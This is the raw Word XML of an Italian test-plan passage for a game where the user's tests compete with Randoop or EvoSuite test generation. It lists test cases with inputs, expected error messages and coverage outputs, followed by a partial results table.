      <w:r w:rsidRPr="00715086">
        <w:t>Descrizione: Compilazione, Esecuzione e Calcolo Coverage con EvoSuite di una classe di test con errori</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53108063" w14:textId="77777777" w:rsidR="00E85125" w:rsidRPr="00715086" w:rsidRDefault="00E85125" w:rsidP="00E85125">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Precondizioni: errore sintattico nella classe di test dell’utente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1A4097" w14:textId="77777777" w:rsidR="00E85125" w:rsidRPr="00715086" w:rsidRDefault="00E85125" w:rsidP="00E85125">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Input: clicca sul bottone “Play”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EDE551" w14:textId="26C78183" w:rsidR="00E85125" w:rsidRPr="00715086" w:rsidRDefault="00E85125" w:rsidP="00E85125">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Output atteso: viene mostrato un messaggio di errore: “Errore nel test dell’utente”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B3A69F" w14:textId="77777777" w:rsidR="007B62EF" w:rsidRPr="00715086" w:rsidRDefault="007B62EF" w:rsidP="007B62EF">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67ED04E3" w14:textId="52799AD4" w:rsidR="008C774D" w:rsidRPr="00715086" w:rsidRDefault="008C774D">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Test</w:t>
      </w:r>
      <w:r w:rsidR="00E85125" w:rsidRPr="00715086">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE178D2" w14:textId="33B6B6E0" w:rsidR="008C774D" w:rsidRPr="00715086" w:rsidRDefault="008C774D" w:rsidP="008C774D">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Descrizione: Compilazione</w:t>
      </w:r>
      <w:r w:rsidR="00E67613" w:rsidRPr="00715086">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Esecuzione </w:t>
      </w:r>
      <w:r w:rsidR="00E67613" w:rsidRPr="00715086">
        <w:t xml:space="preserve">e Calcolo Coverage </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t>di una classe di test con errori del robot</w:t>
      </w:r>
      <w:r w:rsidR="00E85125" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> (sia per Randoop che EvoSuite)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E4C98A" w14:textId="1ACF69A5" w:rsidR="008C774D" w:rsidRPr="00715086" w:rsidRDefault="008C774D" w:rsidP="008C774D">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Precondizioni: ci sono stati problemi nel recuper</w:t>
      </w:r>
      <w:r w:rsidR="00E67613" w:rsidRPr="00715086">
        <w:t xml:space="preserve">o </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t>del robot</w:t>
      </w:r>
      <w:r w:rsidR="00E85125" w:rsidRPr="00715086">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t>RobotCoverage = -1</w:t>
      </w:r>
      <w:r w:rsidR="00E85125" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> (path errato)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12145DEC" w14:textId="4CC72E9C" w:rsidR="008C774D" w:rsidRPr="00715086" w:rsidRDefault="008C774D" w:rsidP="008C774D">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Input: clicca sul bottone “</w:t>
      </w:r>
      <w:r w:rsidR="00E67613" w:rsidRPr="00715086">
        <w:t>Play</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2648246F" w14:textId="709B6930" w:rsidR="00E85125" w:rsidRPr="00715086" w:rsidRDefault="008C774D" w:rsidP="00E85125">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Output atteso: viene mostrato un messaggio di errore: “Errore robot”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33649C3B" w14:textId="77777777" w:rsidR="007B62EF" w:rsidRPr="00715086" w:rsidRDefault="007B62EF" w:rsidP="007B62EF">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E6B70ED" w14:textId="06D800AF" w:rsidR="000A2CD0" w:rsidRPr="00715086" w:rsidRDefault="000A2CD0">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Test</w:t>
      </w:r>
      <w:r w:rsidR="00E85125" w:rsidRPr="00715086">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD81236" w14:textId="2088A526" w:rsidR="000A2CD0" w:rsidRPr="00715086" w:rsidRDefault="000A2CD0" w:rsidP="000A2CD0">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Descrizione:</w:t>
      </w:r>
      <w:r w:rsidR="008C774D" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> Generazione dei test Randoop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3F5A7D" w14:textId="187CBD0F" w:rsidR="000A2CD0" w:rsidRPr="00715086" w:rsidRDefault="000A2CD0" w:rsidP="000A2CD0">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Precondizioni:</w:t>
      </w:r>
      <w:r w:rsidR="008C774D" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A603E" w:rsidRPr="00715086">
        <w:t>È</w:t>
      </w:r>
      <w:r w:rsidR="008C774D" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> stata aggiunta una nuova classe nel repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7F4213" w14:textId="32E24084" w:rsidR="000A2CD0" w:rsidRPr="00715086" w:rsidRDefault="000A2CD0" w:rsidP="000A2CD0">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Input:</w:t>
      </w:r>
      <w:r w:rsidR="005435C9" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> Avvio dell’applicazione</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182333BF" w14:textId="5398C85E" w:rsidR="000A2CD0" w:rsidRPr="00715086" w:rsidRDefault="000A2CD0" w:rsidP="008C774D">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Output atteso:</w:t>
      </w:r>
      <w:r w:rsidR="005435C9" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> Vengono generati i livelli contenenti test e coverage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495D9A04" w14:textId="35CA41C6" w:rsidR="000A2CD0" w:rsidRPr="00715086" w:rsidRDefault="005435C9" w:rsidP="007B62EF">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Postcondizioni: I dati prodotti sono salvati nel repository condiviso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DCA8F6" w14:textId="77777777" w:rsidR="007B62EF" w:rsidRPr="00715086" w:rsidRDefault="007B62EF" w:rsidP="007B62EF">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7684E41B" w14:textId="77777777" w:rsidR="002A070B" w:rsidRPr="00715086" w:rsidRDefault="002A070B" w:rsidP="007B62EF">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C4D209C" w14:textId="17E492CB" w:rsidR="000A2CD0" w:rsidRPr="00715086" w:rsidRDefault="000A2CD0">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Test</w:t>
      </w:r>
      <w:r w:rsidR="00E85125" w:rsidRPr="00715086">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E8DAE3" w14:textId="5F926486" w:rsidR="000A2CD0" w:rsidRPr="00715086" w:rsidRDefault="000A2CD0" w:rsidP="000A2CD0">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Descrizione:</w:t>
      </w:r>
      <w:r w:rsidR="008C774D" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> Generazione dei test EvoSuite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2122049E" w14:textId="7FB27A59" w:rsidR="000A2CD0" w:rsidRPr="00715086" w:rsidRDefault="000A2CD0" w:rsidP="000A2CD0">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Precondizioni:</w:t>
      </w:r>
      <w:r w:rsidR="005435C9" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A603E" w:rsidRPr="00715086">
        <w:t>È</w:t>
      </w:r>
      <w:r w:rsidR="005435C9" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> stata aggiunta una nuova classe nel repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3117E62F" w14:textId="75D1A434" w:rsidR="000A2CD0" w:rsidRPr="00715086" w:rsidRDefault="000A2CD0" w:rsidP="000A2CD0">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Input:</w:t>
      </w:r>
      <w:r w:rsidR="005435C9" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007B62EF" w:rsidRPr="00715086">
        <w:t>./robot_generazione.sh ClassUnderTest ClassUnderTestSourceCode /repository/ClassUnderTest/ClassUnderTestSourceCode 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5D9D7E" w14:textId="0138A35C" w:rsidR="000A2CD0" w:rsidRPr="00715086" w:rsidRDefault="000A2CD0" w:rsidP="008C774D">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Output atteso:</w:t>
      </w:r>
      <w:r w:rsidR="005435C9" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> Vengono generati i livelli contenenti test e coverage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43498924" w14:textId="6A4AC38D" w:rsidR="00FE2834" w:rsidRPr="00715086" w:rsidRDefault="005435C9" w:rsidP="007B62EF">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Postcondizioni: I dati prodotti sono salvati nel repository condiviso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272DCC26" w14:textId="77777777" w:rsidR="007B62EF" w:rsidRPr="00715086" w:rsidRDefault="007B62EF" w:rsidP="007B62EF">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26A8B94B" w14:textId="51A2B57B" w:rsidR="00FE2834" w:rsidRPr="00715086" w:rsidRDefault="00FE2834">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Test</w:t>
      </w:r>
      <w:r w:rsidR="00E85125" w:rsidRPr="00715086">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D938C1" w14:textId="0310B4CA" w:rsidR="00FE2834" w:rsidRPr="00715086" w:rsidRDefault="00FE2834" w:rsidP="00FE2834">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Descrizione: </w:t>
      </w:r>
      <w:r w:rsidR="007B62EF" w:rsidRPr="00715086">
        <w:t>Generazione dei test EvoSuite con errore nell’input (classundertest non esiste)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75631B07" w14:textId="684031CF" w:rsidR="00FE2834" w:rsidRPr="00715086" w:rsidRDefault="00FE2834" w:rsidP="00FE2834">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Precondizioni: </w:t>
      </w:r>
      <w:r w:rsidR="000A603E" w:rsidRPr="00715086">
        <w:t>È</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve"> stata aggiunta una nuova classe nel repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7610D05A" w14:textId="21E0FF45" w:rsidR="00FE2834" w:rsidRPr="00715086" w:rsidRDefault="00FE2834" w:rsidP="00FE2834">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Input: </w:t>
      </w:r>
      <w:r w:rsidR="007B62EF" w:rsidRPr="00715086">
        <w:t>./robot_generazione.sh classundertest ClassUnderTestSourceCode /repository/ClassUnderTest/ClassUnderTestSourceCode 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1613CA" w14:textId="25753A85" w:rsidR="00FE2834" w:rsidRPr="00715086" w:rsidRDefault="00FE2834" w:rsidP="00FE2834">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Output atteso: </w:t>
      </w:r>
      <w:r w:rsidR="007B62EF" w:rsidRPr="00715086">
        <w:t>Errore nella generazione</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFC9488" w14:textId="563CC93F" w:rsidR="007B62EF" w:rsidRPr="00715086" w:rsidRDefault="00FE2834" w:rsidP="00E85125">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Postcondizioni: </w:t>
      </w:r>
      <w:r w:rsidR="007B62EF" w:rsidRPr="00715086">
        <w:t>Non sono generati i test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FA3076" w14:textId="77777777" w:rsidR="00F01B17" w:rsidRPr="00715086" w:rsidRDefault="00F01B17" w:rsidP="007B62EF">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33993F55" w14:textId="5E2A645E" w:rsidR="007B62EF" w:rsidRPr="00715086" w:rsidRDefault="007B62EF">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Test</w:t>
      </w:r>
      <w:r w:rsidR="00E85125" w:rsidRPr="00715086">
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191F809D" w14:textId="06BC116A" w:rsidR="007B62EF" w:rsidRPr="00715086" w:rsidRDefault="007B62EF" w:rsidP="007B62EF">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Descrizione: Generazione dei test EvoSuite con errore nella classe sotto test (vale anche per Randoop)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6895CD9E" w14:textId="4EBC5E7D" w:rsidR="007B62EF" w:rsidRPr="00715086" w:rsidRDefault="007B62EF" w:rsidP="007B62EF">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Precondizioni: </w:t>
      </w:r>
      <w:r w:rsidR="000A603E" w:rsidRPr="00715086">
        <w:t>È</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve"> stata aggiunta una nuova classe con errori sintattici nel repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FE0448" w14:textId="6EA7EC19" w:rsidR="007B62EF" w:rsidRPr="00715086" w:rsidRDefault="007B62EF" w:rsidP="007B62EF">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Input: ./robot_generazione.sh ClassUnderTest ClassUnderTestSourceCode /repository/ClassUnderTest/ClassUnderTestSourceCode 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF72EDA" w14:textId="77777777" w:rsidR="007B62EF" w:rsidRPr="00715086" w:rsidRDefault="007B62EF" w:rsidP="007B62EF">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Output atteso: Errore nella generazione</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CD1BDE" w14:textId="77777777" w:rsidR="007B62EF" w:rsidRPr="00715086" w:rsidRDefault="007B62EF" w:rsidP="007B62EF">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Postcondizioni: Non sono generati i test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2774084D" w14:textId="77777777" w:rsidR="00D71E1A" w:rsidRPr="00715086" w:rsidRDefault="00D71E1A" w:rsidP="00D71E1A"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabellagriglia4-colore1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="931"/>
        <w:gridCol w:w="5443"/>
        <w:gridCol w:w="2552"/>
        <w:gridCol w:w="702"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FE2834" w:rsidRPr="00715086" w14:paraId="68A9375A" w14:textId="77777777" w:rsidTr="00B61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29F7C459" w14:textId="385E17FB" w:rsidR="00FE2834" w:rsidRPr="00715086" w:rsidRDefault="00FE2834" w:rsidP="00B61086">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Test case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5443" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21344F0B" w14:textId="78066498" w:rsidR="00FE2834" w:rsidRPr="00715086" w:rsidRDefault="00B61086" w:rsidP="00B61086">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Input</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EC92220" w14:textId="1D004FA6" w:rsidR="00FE2834" w:rsidRPr="00715086" w:rsidRDefault="00FE2834" w:rsidP="00B61086">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Output</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="702" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="352F0A41" w14:textId="0BE0573D" w:rsidR="00FE2834" w:rsidRPr="00715086" w:rsidRDefault="00FE2834" w:rsidP="00B61086">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Esito</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE2834" w:rsidRPr="00715086" w14:paraId="1DE00404" w14:textId="77777777" w:rsidTr="00B6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3EBD6C6F" w14:textId="54E44B21" w:rsidR="00FE2834" w:rsidRPr="00715086" w:rsidRDefault="007B62EF" w:rsidP="00B61086">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Test1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5443" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03F5B804" w14:textId="406D4ADB"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clicca su “</w:t>
            </w:r>
            <w:r w:rsidR="00E85125" w:rsidRPr="00715086">
              <w:t>Play</w:t>
            </w:r>
            <w:r w:rsidRPr="00715086">
              <w:t>”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04A13531" w14:textId="22CEF735"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viene mostrato il vincitore</w:t>
            </w:r>
            <w:r w:rsidR="00E85125" w:rsidRPr="00715086">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00715086">
              <w:t>i dati di coverage di utente e robot</w:t>
            </w:r>
            <w:r w:rsidR="00E85125" w:rsidRPr="00715086">
              <w:t>, e sono evidenziate le linee di codice coperte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="702" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37825412" w14:textId="639CB6E4"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73096952" w14:textId="77777777" w:rsidTr="00B61086">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="931" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F56A801" w14:textId="0814C710" w:rsidR="00E85125" w:rsidRPr="00715086" w:rsidRDefault="00E85125" w:rsidP="00E85125">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Test2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5443" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A781A86" w14:textId="49C11ABA"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clicca su “Play”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C9E54E7" w14:textId="6BEB9373"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iene mostrato il vincitore e i dati di coverage di utente e robot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="702" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="612C1408" w14:textId="47849EA2"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2AD73B3F" w14:textId="77777777" w:rsidTr="00B6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3606E040" w14:textId="4D9EACC7" w:rsidR="00E85125" w:rsidRPr="00715086" w:rsidRDefault="00E85125" w:rsidP="00E85125">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Test3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5443" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40D5C613" w14:textId="2999FA6F"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clicca su “Play”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="641CA409" w14:textId="3EF11C73"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iene mostrato un messaggio di errore: “Errore nel test dell’utente”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="702" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39CDE501" w14:textId="12218843"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77CE7FB7" w14:textId="77777777" w:rsidTr="00B61086">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="931" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EB8538C" w14:textId="7E599A4D" w:rsidR="00E85125" w:rsidRPr="00715086" w:rsidRDefault="00E85125" w:rsidP="00E85125">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Test4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5443" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6069FC4C" w14:textId="7138063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clicca su “Play”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D00D2AA" w14:textId="0D548A56"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iene mostrato un messaggio di errore: “Errore nel test dell’utente”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="702" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="039EA28C" w14:textId="7F4BCAF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1995B79D" w14:textId="77777777" w:rsidTr="00B6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1E08983C" w14:textId="3A1E6CDA" w:rsidR="00E85125" w:rsidRPr="00715086" w:rsidRDefault="00E85125" w:rsidP="00E85125">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Test5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5443" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AC5000D" w14:textId="2B8C0BFB"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clicca su “Play”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="029FCCCA" w14:textId="0A865C55"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iene mostrato un messaggio di errore: “Errore robot”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="702" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47802199" w14:textId="2CE57897"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0D3DBDBD" w14:textId="77777777" w:rsidTr="00B61086">
        <w:tc>
          <w:tcPr>
